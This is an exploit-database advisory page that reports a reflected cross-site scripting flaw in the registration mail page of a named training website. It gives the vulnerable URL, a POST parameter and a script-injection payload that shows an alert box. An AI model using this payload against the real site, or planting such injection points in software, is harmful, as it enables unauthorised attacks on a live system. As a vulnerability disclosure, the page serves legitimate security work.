Ashiyane Training Center Site Scripting

2017.01.20
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

|=============================================================| |[+] Exploit Title: Ashiyane Training Center Site Scripting |[+] |[+] Exploit Author: Hacker.khan |[+] |[+] Vendor Homepage: http://train.ashiyane.ir |[+] |[+] Tested on: Win7 |[+] |[+] Date: 2017-01-17 |=============================================================| |[+] The use of this vulnerability through which an attacker Hackbr plugin using scripts can be run on your site |[+] Vulnerability Path : http://train.ashiyane.ir/register/mail.php |[+] Put the code in the plug-hacking on the box |[+] Enable post data |[+] D1="><script>alert(/xss/)</script> |[+] ID: Hacker.khan@xtra.co.nz ================================================================= |[+] Thanks to : Iranian Anonymous |[+] Exploit Author: Hacker.khan


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top